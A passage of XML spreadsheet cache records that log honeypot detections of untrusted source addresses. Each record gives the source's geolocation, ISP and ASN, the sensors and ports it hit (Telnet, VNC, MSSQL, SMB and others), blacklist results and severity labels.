    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:722a:9e79"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2462"/>
    <x v="2462"/>
    <s v="NA&amp;&amp;218-161-20-75.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-09T12:10:09"/>
    <d v="2025-01-22T22:40:58"/>
    <d v="2025-04-09T12:10:09"/>
    <n v="41"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;17355&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:daa1:144b"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2463"/>
    <x v="2463"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T12:05:15"/>
    <d v="2023-08-11T09:28:00"/>
    <d v="2025-04-09T12:05:15"/>
    <n v="1514"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H33&amp;&amp;SMA-LAB_MSSQL_H36&amp;&amp;SMA-LAB_ORACLE_H45&amp;&amp;SMA-LAB_REDIS_H18&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_SMB_H46"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;60323&amp;&amp;59862&amp;&amp;445&amp;&amp;1521&amp;&amp;6379&amp;&amp;7646"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Coimbatore"/>
    <s v="Coimbatore (Balaji Nagar)"/>
    <s v="1273865"/>
    <s v="641018"/>
    <s v="11.0223"/>
    <s v="76.9797"/>
    <s v="45284"/>
    <s v="Wireline Solution India Pvt Ltd."/>
    <s v="WLSNET"/>
    <s v="cellular"/>
    <s v="Wireless Solution India Pvt Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.151,60183)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:79c8:3597"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2464"/>
    <x v="2464"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T11:57:13"/>
    <d v="2025-04-02T18:43:23"/>
    <d v="2025-04-09T11:57:13"/>
    <n v="48"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H43"/>
    <s v="5900"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="SG"/>
    <s v="Ho Chi Minh"/>
    <s v="Quận Bốn"/>
    <s v="Quận Bốn"/>
    <s v="9645071"/>
    <s v="NA"/>
    <s v="10.7644"/>
    <s v="106.696"/>
    <s v="135944"/>
    <s v="VinhNam Commercial informatics service corporation"/>
    <s v="SPT"/>
    <s v="business"/>
    <s v="Saigon Postel Corporation"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b45d:ac3f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2465"/>
    <x v="2465"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T11:55:20"/>
    <d v="2024-11-22T13:40:30"/>
    <d v="2025-04-09T11:55:20"/>
    <n v="12"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="3306&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="AP"/>
    <s v="Andhra Pradesh"/>
    <s v="Eluru"/>
    <s v="Chebrolu"/>
    <s v="10768055"/>
    <s v="533449"/>
    <s v="17.2134"/>
    <s v="82.3176"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="Adarsh College Of Engineering"/>
    <s v="1999-03-16"/>
    <s v="ACEE"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d2d4:d244"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2466"/>
    <x v="2466"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T11:35:21"/>
    <d v="2025-04-09T11:33:03"/>
    <d v="2025-04-09T11:35:21"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="143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NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ca:8a9f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2467"/>
    <x v="2467"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T11:30:20"/>
    <d v="2025-04-09T10:57:33"/>
    <d v="2025-04-09T11:30:20"/>
    <n v="23"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['spam'&amp;&amp; 'exploits']}"/>
    <n v="43"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="WB"/>
    <s v="West Bengal"/>
    <s v="North 24 Parganas"/>
    <s v="Hālīsahar"/>
    <s v="1270484"/>
    <s v="NA"/>
    <s v="22.9322"/>
    <s v="88.4186"/>
    <s v="135872"/>
    <s v="GTPL KCBPL BROADBAND PVT LTD"/>
    <s v="Gtpl Kcbpl Broadband PVT LTD"/>
    <s v="residential"/>
    <s v="Raiganj Cable TV PVT LTD"/>
    <s v="2021-11-03"/>
    <s v="RCTVPL"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67af:a824"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2468"/>
    <x v="2468"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T11:11:22"/>
    <d v="2025-04-04T23:53:25"/>
    <d v="2025-04-09T11:11:22"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;abuseipdb"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Kaohsiung"/>
    <s v="Kaohsiung"/>
    <s v="Fongshan District"/>
    <s v="1673816"/>
    <s v="NA"/>
    <s v="22.5845"/>
    <s v="120.401"/>
    <s v="24165"/>
    <s v="UNION BROADBAND NETWORK"/>
    <s v="PHOENIX"/>
    <s v="business"/>
    <s v="TFN Media Co., Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7afe:1df6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2469"/>
    <x v="2469"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T10:52:47"/>
    <d v="2025-02-24T11:06:54"/>
    <d v="2025-04-09T10:52:47"/>
    <n v="28"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433&amp;&amp;3306&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6139"/>
    <s v="77.209"/>
    <s v="133275"/>
    <s v="Gigantic Infotel Pvt Ltd"/>
    <s v="Gigantic Network Solution"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="GTEL-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (43.249.52.75,52525)}&amp;&amp;{Data_SMB:Incoming connection (43.249.52.75,53014)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2bf9:344b"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2470"/>
    <x v="2470"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T10:49:18"/>
    <d v="2025-04-09T10:49:18"/>
    <d v="2025-04-09T10:49:18"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Vijayanagar"/>
    <s v="Hampi"/>
    <s v="1270448"/>
    <s v="NA"/>
    <s v="15.3352"/>
    <s v="76.4603"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c0:80fd"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2471"/>
    <x v="2471"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T10:43:27"/>
    <d v="2025-01-16T20:55:54"/>
    <d v="2025-04-09T10:43:27"/>
    <n v="16"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_HC1"/>
    <s v="5900"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="Kota Administrasi Jakarta Pusat"/>
    <s v="Jakarta Pusat"/>
    <s v="6754874"/>
    <s v="NA"/>
    <s v="-6.18104"/>
    <s v="106.826"/>
    <s v="7713"/>
    <s v="Telekomunikasi Indonesia (PT)"/>
    <s v="Telekomunikasi Indonesia"/>
    <s v="business"/>
    <s v="HSI Indihome"/>
    <s v="2011-01-14"/>
    <s v="TELKOMNET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:245d:ed72"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2472"/>
    <x v="2472"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T10:27:19"/>
    <d v="2024-04-14T13:23:37"/>
    <d v="2025-04-09T10:27:19"/>
    <n v="12"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_HTTP_H39"/>
    <s v="22458&amp;&amp;23&amp;&amp;80"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IR"/>
    <s v="Iran"/>
    <s v="22"/>
    <s v="Hormozgan"/>
    <s v="NA"/>
    <s v="Bandar Abbas (Qal‘eh Shāhī)"/>
    <s v="141681"/>
    <s v="NA"/>
    <s v="27.1779"/>
    <s v="56.2744"/>
    <s v="42337"/>
    <s v="Respina Networks &amp; Beyond PJSC"/>
    <s v="Respina Networks &amp; Beyond PJSC"/>
    <s v="business"/>
    <s v="Dadeh Pardazan Avaye Bandar Company"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="GET&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Content-Length': '0', 'Host': '38.60.224.106:80', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2bd:5c0e"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2473"/>
    <x v="2473"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T10:11:09"/>
    <d v="2025-04-09T10:11:09"/>
    <d v="2025-04-09T10:11:09"/>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harat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="BB Multiplay"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d6:6123"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2474"/>
    <x v="2474"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T10:07:33"/>
    <d v="2025-04-09T10:07:33"/>
    <d v="2025-04-09T10:07:33"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="Wimax Project"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ff:19ca"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2475"/>
    <x v="2475"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T10:05:54"/>
    <d v="2025-04-09T06:38:41"/>
    <d v="2025-04-09T10:05:54"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="PB"/>
    <s v="Punjab"/>
    <s v="Ludhiana"/>
    <s v="Samrāla"/>
    <s v="1257503"/>
    <s v="NA"/>
    <s v="30.836"/>
    <s v="76.1932"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="MTNL Mumbai"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2004-11-30"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb7:15b5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2476"/>
    <x v="2476"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T10:00:54"/>
    <d v="2024-04-13T11:30:50"/>
    <d v="2025-04-09T10:00:54"/>
    <n v="31"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H45"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;15784&amp;&amp;23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="AP"/>
    <s v="Andhra Pradesh"/>
    <s v="Nandyal"/>
    <s v="Nandyāl"/>
    <s v="1261927"/>
    <s v="NA"/>
    <s v="15.478"/>
    <s v="78.4836"/>
    <s v="133656"/>
    <s v="Krp Communications"/>
    <s v="KRP COMMUNICATIONS"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67bf:6429"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2477"/>
    <x v="2477"/>
    <s v="host-79-45-218-145.retail.telecomitalia.it"/>
    <x v="0"/>
    <d v="2025-04-09T09:46:02"/>
    <d v="2025-04-09T09:46:02"/>
    <d v="2025-04-09T09:46:02"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="IT"/>
    <s v="Italy"/>
    <s v="45"/>
    <s v="Emilia-Romagna"/>
    <s v="Bologna"/>
    <s v="Villa Salina"/>
    <s v="8949441"/>
    <s v="NA"/>
    <s v="44.5545"/>
    <s v="11.3518"/>
    <s v="3269"/>
    <s v="ASN-IBSNAZ"/>
    <s v="Interbusiness"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1996-01-29 00:00:00"/>
    <s v="2026-01-29 00:00:00"/>
    <s v="2025-02-14 00:53:45"/>
    <s v="ns.telecomitalia.it_x000a_  dnsts.interbusiness.it"/>
    <s v="Telecom Italia s.p.a."/>
    <s v="ok"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4f2d:da91"/>
    <s v="C-I_D"/>
    <s v="low"/>
